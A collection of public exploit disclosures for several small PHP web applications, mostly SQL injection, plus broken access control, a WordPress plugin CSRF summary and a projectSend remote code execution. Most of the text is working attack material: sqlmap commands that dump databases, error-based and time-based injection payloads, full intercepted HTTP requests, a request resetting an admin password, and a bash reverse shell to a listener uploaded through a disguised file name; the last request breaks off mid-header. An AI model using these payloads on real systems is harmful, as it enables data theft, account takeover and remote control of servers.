SQL injection vulnerability found in Tailor Management System v.1 allows a remote authenticated attacker to execute arbitrary code via the customer parameter of the email.php page.

**CVE-s + Tailor Management System V.1**

> \[Vulnerability Type\]
> 
> > SQL Injection

> \[Affected Component\]
> 
> > as you can see in email.php line 50 $result = $pdo->query("SELECT email FROM customer WHERE fullname='$customer'"); the parameter "$customer" is not filtered ,and without prepare statement .

> \[Attack Type\]
> 
> > Remote

> \[Attack Vectors\]
> 
> > you have to be authenticated , go to email.php file and full all the inputs with the necessary information, intercept the request using burp suite, and in the request you will see the method is post and the customer parameter will be exploitable , you will save the request and using sqlmap to exploit the vulnerability . Parameter: #1\* ((custom) POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: customer=0' AND (SELECT 2532 FROM (SELECT(SLEEP(5)))ZLDl) AND 'Dfud'='Dfud&template=Your Clothes are ready for collection. Thanks for your patronage&message=Dear 0, Your Clothes are ready for collection. Thanks for your patronage

> \[Discoverer\]
> 
> > Abdallah Fouad , Bassam Assiri

> \[Vendor of Product\]
> 
> > SourceCodester

> \[Affected Product Code Base\]
> 
> > Tailor Management System V.1

RISK: High

> \[Vulnerability Type\]
> 
> > SQL Injection

> \[Affected Component\]
> 
> > by reviewing the source code, $oldd = $pdo->query("SELECT \* FROM customer WHERE id='".$eid."'"); line 90 $eid = $\_GET\["id"\]; line 41 no validation found while execution the query

> \[Attack Type\]
> 
> > Remote

> \[Attack Vectors\]
> 
> > after login navigate the this page : http://localhost/tailor/customeredit.php , and edit the user data you will see the parameter reflected in url like this : http://localhost/tailor/customeredit.php?id=1 , using the sqlmap with this link you should see the following Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1' AND 8449=8449 AND 'iurJ'='iurJ Type: time-based blind Title: MySQL < 5.0.12 OR time-based blind (heavy query) Payload: id=1' OR 3412=BENCHMARK(5000000,MD5(0x67504658)) AND 'Vzxv'='Vzxv Type: UNION query Title: Generic UNION query (NULL) - 8 columns Payload: id=-2894' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x7171787671,0x526c664b74446c5277577653754f7146475152747377417975734579655658764766626e6869694a,0x7178787671),NULL,NULL-- pUIM

> \[Discoverer\]
> 
> > Abdallah Fouad , Bassam Assiri

> \[Vendor of Product\]
> 
> > SourceCodester

> \[Affected Product Code Base\]
> 
> > Tailor Management System V.1

RISK: High

> \[Vulnerability Type\]
> 
> > SQL Injection

> \[Affected Component\]
> 
> > by reviewing the source code in document.php from line 43 to line 57 ( $detail = $\_POST\["detail"\]; ) ,execute the query in line 57 $res = $pdo->exec("INSERT INTO documents SET title='".$title."', detail='".$detail."', img='".$bgimg."'");

> \[Attack Type\]
> 
> > Remote

> \[Attack Vectors\]
> 
> > login and go http://localhost/tailor/document.php , set the document title and send the request , by intercept the request using burp suite and save the request and send it request to sqlmap this will confirm the vulnerability exist Parameter: MULTIPART #1\* ((custom) POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: ------WebKitFormBoundaryvizUXbIL1AEu2VY4 Content-Disposition: form-data; name="title" ------WebKitFormBoundaryvizUXbIL1AEu2VY4 Content-Disposition: form-data; name="detail" aa' AND (SELECT 2393 FROM (SELECT(SLEEP(5)))JGfe) AND 'keIn'='keIn ------WebKitFormBoundaryvizUXbIL1AEu2VY4 Content-Disposition: form-data; name="bgimg"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundaryvizUXbIL1AEu2VY4--

> \[Discoverer\]
> 
> > Abdallah Fouad , Bassam Assiri

> \[Vendor of Product\]
> 
> > SourceCodester

> \[Affected Product Code Base\]
> 
> > Tailor Management System V.1

RISK: High

> \[Vulnerability Type\]
> 
> > SQL Injection

> \[Affected Component\]
> 
> > by reviewing the source code in document.php from line 42 to line 57 ( $title = $\_POST\["title"\]; ) ,execute the query in line 57 $res = $pdo->exec("INSERT INTO documents SET title='".$title."', detail='".$detail."', img='".$bgimg."'");

> \[Attack Type\]
> 
> > Remote

> \[Discoverer\]
> 
> > Abdallah Fouad , Bassam Assiri

> \[Vendor of Product\]
> 
> > SourceCodester

> \[Affected Product Code Base\]
> 
> > Tailor Management System V.1

RISK: High

> \[Vulnerability Type\]
> 
> > SQL Injection

> \[Affected Component\]
> 
> > After reviewing the source code for the software, I found that in orderadd.php file using unsafe way to insert the data from the requests without any validation. from line number 45 (the query ),and execute the query in line 54.

> \[Attack Type\]
> 
> > Remote

> \[Attack Vectors\]
> 
> > after login go to http://localhost:8080/tailor/tailor/orderadd.php page , then full out all the form , intercept the request by using burp suite and by using sqlmap with inject able point from the POST request { customer=_&desc=test&date\_received=&amount=1&paid=1&completed=Yes&date\_collected=2020-12-26 } , the customer. sqlmap data : (custom) POST parameter '#1_' is vulnerable. Do you want to keep testing the others (if any)? \[y/N\] N sqlmap identified the following injection point(s) with a total of 93 HTTP(s) requests: --- Parameter: #1\* ((custom) POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: customer=' AND (SELECT 9665 FROM (SELECT(SLEEP(5)))QEDW) AND 'dcCY'='dcCY&desc=
> > 
> > X&date\_receiv ed=&amount=1&paid=1&completed=Yes&date\_collected=2020-12-26 ==================================================================================--------

> \[Discoverer\]
> 
> > Abdallah Fouad Mohamed

> \[Vendor of Product\]
> 
> > SourceCodester

> \[Affected Product Code Base\]
> 
> > Tailor Management System V.1

RISK: High

Impact: he impact SQL injection can have on a business is far-reaching. A successful attack may result in the unauthorized viewing of user lists, the deletion of entire tables and, in certain cases, the attacker gaining administrative rights to a database, all of which are highly detrimental to a business.

CVE-2020-36071: CVE-s/README.md at main · Abdallah-Fouad-X/CVE-s

Auto Dealer Management System version 1.0 suffers from a broken access control vulnerability

# Exploit Title: Auto Dealer Management System 1.0 - Broken Access Control Exploit

It leads to compromise of all application accounts by accessing the ?page=user/list with low privileged user account

### Date:   
> 18 February 2023

### CVE Assigned: **[CVE-2023-0916](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0916)** [mitre.org](https://www.cve.org/CVERecord?id=CVE-2023-0916) [nvd.nist.org](https://nvd.nist.gov/vuln/detail/CVE-2023-0916)

### Author:   
> Muhammad Navaid Zafar Ansari  
### Vendor Homepage:  
> https://www.sourcecodester.com  
### Software Link:  
> [Auto Dealer Management System](https://www.sourcecodester.com/php/15371/auto-dealer-management-system-phpoop-free-source-code.html)  
### Version:  
> v 1.0  
### Broken Authentication:  
> Broken Access Control is a type of security vulnerability that occurs when a web application fails to properly restrict users' access to certain resources and functionality. Access control is the process of ensuring that users are authorized to access only the resources and functionality that they are supposed to. Broken Access Control can occur due to poor implementation of access controls in the application, failure to validate input, or insufficient testing and review.

# Tested On: Windows 11 

### Affected Page:  
> list.php , manage_user.php

> On these page, application isn't verifying the authorization mechanism. Due to that, all the parameters are vulnerable to broken access control and low privilege user could view the list of user's and change any user password to access it.

### Description:  
> Broken access control allows low privilege attacker to change password of all application users

### Proof of Concept:  
> Following steps are involved:  
1. Visit the vulnerable page: ?page=user/list  
2. Click on Action and Edit the password of Admin

![image](https://user-images.githubusercontent.com/123810418/219884701-0f1feb4f-6c8a-4299-b510-1762461910ee.png)

4. Update the Password and Submit

5. Request:  
```  
POST /adms/classes/Users.php?f=save HTTP/1.1  
Host: localhost  
Content-Length: 877  
sec-ch-ua: "Chromium";v="109", "Not_A Brand";v="99"  
Accept: */*  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfODLB5j55MvB5pGU  
X-Requested-With: XMLHttpRequest  
sec-ch-ua-mobile: ?0  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36  
sec-ch-ua-platform: "Windows"  
Origin: http://localhost  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: cors  
Sec-Fetch-Dest: empty  
Referer: http://localhost/adms/admin/?page=user/manage_user&id=1  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Cookie: PHPSESSID=c1ig2qf0q44toal7cqbqvikli5  
Connection: close

------WebKitFormBoundaryfODLB5j55MvB5pGU  
Content-Disposition: form-data; name="id"

1  
------WebKitFormBoundaryfODLB5j55MvB5pGU  
Content-Disposition: form-data; name="firstname"

Adminstrator  
------WebKitFormBoundaryfODLB5j55MvB5pGU  
Content-Disposition: form-data; name="middlename"

------WebKitFormBoundaryfODLB5j55MvB5pGU  
Content-Disposition: form-data; name="lastname"

Admin  
------WebKitFormBoundaryfODLB5j55MvB5pGU  
Content-Disposition: form-data; name="username"

admin  
------WebKitFormBoundaryfODLB5j55MvB5pGU  
Content-Disposition: form-data; name="password"

admin123  
------WebKitFormBoundaryfODLB5j55MvB5pGU  
Content-Disposition: form-data; name="type"

1  
------WebKitFormBoundaryfODLB5j55MvB5pGU  
Content-Disposition: form-data; name="img"; filename=""  
Content-Type: application/octet-stream

------WebKitFormBoundaryfODLB5j55MvB5pGU--

```  
6. Successful exploit screenshots are below (without cookie parameter)  
![image](https://user-images.githubusercontent.com/123810418/219884923-5283fca6-d509-4c48-9db0-f61ea6dbb352.png)

7. Vulnerable Code Snippets:

![image](https://user-images.githubusercontent.com/123810418/219884994-e74d7d48-4d45-4135-9a38-45e26c65434b.png)

![image](https://user-images.githubusercontent.com/123810418/219885023-a76afbe0-88f0-4aaa-89cd-1e541e511427.png)

### Recommendation:  
> Whoever uses this CMS, should update the authorization mechanism on top of the  list.php , manage_user.php pages as per requirement to avoid a Broken Access Control attack

Thank you for reading for more demo visit my github: https://github.com/navaidzansari/CVE_Demo

Auto Dealer Management System 1.0 Broken Access Control

Intern Record System version 1.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Intern Record System v1.0 - SQL Injection (Unauthenticated)# Date: 2022-06-09# Exploit Author: Hamdi Sevben# Vendor Homepage: https://code-projects.org/intern-record-system-in-php-with-source-code/# Software Link: https://download-media.code-projects.org/2020/03/Intern_Record_System_In_PHP_With_Source_Code.zip# Version: 1.0# Tested on: Windows 10 Pro + PHP 8.1.6, Apache 2.4.53# CVE: CVE-2022-40347# References: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40347https://github.com/h4md153v63n/CVE-2022-40347_Intern-Record-System-phone-V1.0-SQL-Injection-Vulnerability-Unauthenticated------------------------------------------------------------------------------------1. Description:----------------------Intern Record System 1.0 allows SQL Injection via parameters 'phone', 'email', 'deptType' and 'name' in /intern/controller.php Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latest vulnerabilities in the underlying database.2. Proof of Concept:----------------------In sqlmap use 'phone', 'email', 'deptType' or 'name' parameter to dump 'department' database. Then run SQLmap to extract the data from the database:sqlmap.py -u "http://localhost/intern/controller.php" -p "deptType" --risk="3" --level="3" --method="POST" --data="phone=&email=&deptType=test&name=" --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36" --headers="Host:localhost\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\nAccept-Encoding:gzip, deflate\nAccept-Language:en-us,en;q=0.5\nCache-Control:no-cache\nContent-Type:application/x-www-form-urlencoded\nReferer:http://localhost/intern/" --dbms="MySQL" --batch --dbs -D department --dumpsqlmap.py -u "http://localhost/intern/controller.php" -p "email" --risk="3" --level="3" --method="POST" --data="phone=&email=test&deptType=3&name=" --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36" --headers="Host:localhost\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\nAccept-Encoding:gzip, deflate\nAccept-Language:en-us,en;q=0.5\nCache-Control:no-cache\nContent-Type:application/x-www-form-urlencoded\nReferer:http://localhost/intern/" --dbms="MySQL" --batch --dbs -D department --dumpsqlmap.py -u "http://localhost/intern/controller.php" -p "name" --risk="3" --level="3" --method="POST" --data="phone=&email=&deptType=3&name=test" --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36" --headers="Host:localhost\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\nAccept-Encoding:gzip, deflate\nAccept-Language:en-us,en;q=0.5\nCache-Control:no-cache\nContent-Type:application/x-www-form-urlencoded\nReferer:http://localhost/intern/" --dbms="MySQL" --batch --dbs -D department --dumpsqlmap.py -u "http://localhost/intern/controller.php" -p "phone" --risk="3" --level="3" --method="POST" --data="phone=test&email=&deptType=3&name=" --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36" --headers="Host:localhost\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\nAccept-Encoding:gzip, deflate\nAccept-Language:en-us,en;q=0.5\nCache-Control:no-cache\nContent-Type:application/x-www-form-urlencoded\nReferer:http://localhost/intern/" --dbms="MySQL" --batch --dbs -D department --dump3. Example payload:-----------------------1%27+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)%2b%274. Burpsuite request on 'phone' parameter:----------------------POST /intern/controller.php HTTP/1.1Host: localhostAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8Accept-Encoding: gzip, deflateAccept-Language: en-us,en;q=0.5Cache-Control: no-cacheContent-Length: 317Content-Type: application/x-www-form-urlencodedReferer: http://localhost/intern/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36phone=-1%27+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)%2b%27&email=&deptType=3&name=5. Burpsuite request on 'email' parameter:----------------------POST /intern/controller.php HTTP/1.1Host: localhostAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8Accept-Encoding: gzip, deflateAccept-Language: en-us,en;q=0.5Cache-Control: no-cacheContent-Length: 317Content-Type: application/x-www-form-urlencodedReferer: http://localhost/intern/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36phone=&email=-1%27+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)%2b%27&deptType=3&name=6. Burpsuite request on 'deptType' parameter:----------------------POST /intern/controller.php HTTP/1.1Host: localhostAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8Accept-Encoding: gzip, deflateAccept-Language: en-us,en;q=0.5Cache-Control: no-cacheContent-Length: 316Content-Type: application/x-www-form-urlencodedReferer: http://localhost/intern/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36phone=&email=&deptType=-1%27+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)%2b%27&name=7. Burpsuite request on 'name' parameter:----------------------POST /intern/controller.php HTTP/1.1Host: localhostAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8Accept-Encoding: gzip, deflateAccept-Language: en-us,en;q=0.5Cache-Control: no-cacheContent-Length: 317Content-Type: application/x-www-form-urlencodedReferer: http://localhost/intern/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36phone=&email=&deptType=3&name=-1%27+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)%2b%27

Intern Record System 1.0 SQL Injection

Simple Task Managing System version 1.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Simple Task Managing System v1.0 - SQL Injection (Unauthenticated)# Date: 2022-01-09# Exploit Author: Hamdi Sevben# Vendor Homepage: https://www.sourcecodester.com/php/15624/simple-task-managing-system-php-mysqli-free-source-code.html# Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/Task%20Managing%20System%20in%20PHP.zip# Version: 1.0# Tested on: Windows 10 Pro + PHP 8.1.6, Apache 2.4.53# CVE: CVE-2022-40032# References: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40032https://github.com/h4md153v63n/CVE-2022-40032_Simple-Task-Managing-System-V1.0-SQL-Injection-Vulnerability-Unauthenticated------------------------------------------------------------------------------------1. Description:----------------------Simple Task Managing System 1.0 allows SQL Injection via parameters 'login' and 'password' in /TaskManagingSystem/login.php Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latest vulnerabilities in the underlying database.2. Proof of Concept:----------------------In sqlmap use 'login' parameter or 'password' parameter to dump users table from 'tasker' database. Then run SQLmap to extract the data from the database:sqlmap.py -u "http://localhost/TaskManagingSystem/loginValidation.php" -p "login" --risk="3" --level="3" --method="POST" --data="login=test&password=" --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36" --headers="Host:localhost\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\nAccept-Encoding:gzip, deflate\nAccept-Language:en-us,en;q=0.5\nCache-Control:no-cache\nContent-Type:application/x-www-form-urlencoded\nReferer:http://localhost/TaskManagingSystem/login.php" --dbms="MySQL" --batch --dbs -D tasker -T users --dumpsqlmap.py -u "http://localhost/TaskManagingSystem/loginValidation.php" -p "password" --risk="3" --level="3" --method="POST" --data="login=&password=test" --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36" --headers="Host:localhost\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\nAccept-Encoding:gzip, deflate\nAccept-Language:en-us,en;q=0.5\nCache-Control:no-cache\nContent-Type:application/x-www-form-urlencoded\nReferer:http://localhost/TaskManagingSystem/login.php" --dbms="MySQL" --batch --dbs -D tasker -T users --dump3. Example payload:-----------------------1%27+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)%2b%274. Burpsuite request on 'login' parameter:----------------------POST /TaskManagingSystem/loginValidation.php HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 312Origin: http://localhostConnection: closeReferer: http://localhost/TaskManagingSystem/login.phpCookie: PHPSESSID=samt0gti09djsstpqaj0pg4ta8Upgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1login=-1%27+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)%2b%27&password=P@ssw0rd!5. Burpsuite request on 'password' parameter:----------------------POST /TaskManagingSystem/loginValidation.php HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 307Origin: http://localhostConnection: closeReferer: http://localhost/TaskManagingSystem/login.phpCookie: PHPSESSID=samt0gti09djsstpqaj0pg4ta8Upgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1login=user&password=-1%27+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)%2b%27

Simple Task Managing System 1.0 SQL Injection

A vulnerability was found in SourceCodester Simple Mobile Comparison Website 1.0. It has been classified as critical. Affected is an unknown function of the file /admin/categories/view_category.php of the component GET Parameter Handler. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-225150 is the identifier assigned to this vulnerability.

**Simple Mobile Comparison Website v1.0 has SQL injection**

BUG\_Author:Zhang RuiMing

Website source address:https://www.sourcecodester.com/php/15186/simple-mobile-comparison-website-phpoop-free-source-code.html

Vulnerability File: /mcw/admin/categories/view\_category.php

GET parameter 'id' exists SQL injection vulnerability

Payload1:id=1' and (select 1 from(select count(\*),concat(0x61626364,(select (elt(111=111,1))),0x51525354,floor(rand(0)\*2))x from information\_schema.plugins group by x)a) and 'a'='a

    GET /mcw/admin/categories/view_category.php?id=1%27%20and%20(select%201%20from(select%20count(*),concat(0x61626364,(select%20(elt(111=111,1))),0x51525354,floor(rand(0)*2))x%20from%20information_schema.plugins%20group%20by%20x)a)%20and%20%27a%27=%27a HTTP/1.1
    Host: localhost
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
    Cookie: revenue[LastUrl]=%2Frates%2Fadmin%2Fsystem_settingslist.php; PHPSESSID=1n6947aiql2hh8itbuvff2apro
    Connection: close
    

Injection success based on errors

Payload2:id=1' and (select 1 from (select(sleep(20)))o) and 'o'='o

    GET /mcw/admin/categories/view_category.php?id=1%27%20and%20(select%201%20from%20(select(sleep(20)))o)%20and%20%27o%27=%27o HTTP/1.1
    Host: localhost
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
    Cookie: revenue[LastUrl]=%2Frates%2Fadmin%2Fsystem_settingslist.php; PHPSESSID=1n6947aiql2hh8itbuvff2apro
    Connection: close
    

Server response time is 20 seconds

CVE-2023-1908: bug_report/SQLi-1.md at main · Kerkong/bug_report

The WCFM Frontend Manager plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 6.6.0 due to missing nonce checks on various AJAX actions. This makes it possible for unauthenticated attackers to perform a wide variety of actions such as modifying knowledge bases, modifying notices, modifying payments, managing vendors, capabilities, and so much more, via a forged request granted they can trick a site's administrator into performing an action such as clicking on a link. There were hundreds of AJAX endpoints affected.

CVE-2022-4938: Changeset 2632630 for wc-frontend-manager – WordPress Plugin Repository

projectSend r1605 suffers from a remote code execution vulnerability.

Exploit Title: projectSend r1605 - Remote Code Exectution RCE  
Application: projectSend  
Version: r1605  
Bugs:  rce via file extension manipulation  
Technology: PHP  
Vendor URL: https://www.projectsend.org/  
Software Link: https://www.projectsend.org/  
Date of found: 26-01-2023  
Author: Mirabbas Ağalarov  
Tested on: Linux   
POC video: https://youtu.be/Ln7KluDfnk4

2. Technical Details & POC  
========================================

1.The attacker first creates a txt file and pastes the following code. Next, the Attacker changes the file extension to jpg. Because the system php,sh,exe etc. It does not allow files. 

bash -i >& /dev/tcp/192.168.100.18/4444 0>&1

2.Then the attacker starts listening for ip and port   
 nc -lvp 4444

 3.and when uploading file it makes http request as below.file name should be like this      openme.sh;jpg

POST /includes/upload.process.php HTTP/1.1  
Host: localhost  
Content-Length: 525  
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"  
sec-ch-ua-platform: "Linux"  
sec-ch-ua-mobile: ?0  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary0enbZuQQAtahFVjI  
Accept: */*  
Origin: http://localhost  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: cors  
Sec-Fetch-Dest: empty  
Referer: http://localhost/upload.php  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Cookie: download_started=false; PHPSESSID=jtk7d0nats7nb1r5rjm7a6kj59  
Connection: close

------WebKitFormBoundary0enbZuQQAtahFVjI  
Content-Disposition: form-data; name="name"

openme.sh;jpg  
------WebKitFormBoundary0enbZuQQAtahFVjI  
Content-Disposition: form-data; name="chunk"

0  
------WebKitFormBoundary0enbZuQQAtahFVjI  
Content-Disposition: form-data; name="chunks"

1  
------WebKitFormBoundary0enbZuQQAtahFVjI  
Content-Disposition: form-data; name="file"; filename="blob"  
Content-Type: application/octet-stream

bash -i >& /dev/tcp/192.168.100.18/4444 0>&1

------WebKitFormBoundary0enbZuQQAtahFVjI--

4.In the second request, we do this to the filename section at the bottom.

openme.sh

POST /files-edit.php?ids=34 HTTP/1.1  
Host: localhost  
Content-Length: 1016  
Cache-Control: max-age=0  
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"  
sec-ch-ua-mobile: ?0  
sec-ch-ua-platform: "Linux"  
Upgrade-Insecure-Requests: 1  
Origin: http://localhost  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryc8btjvyb3An7HcmA  
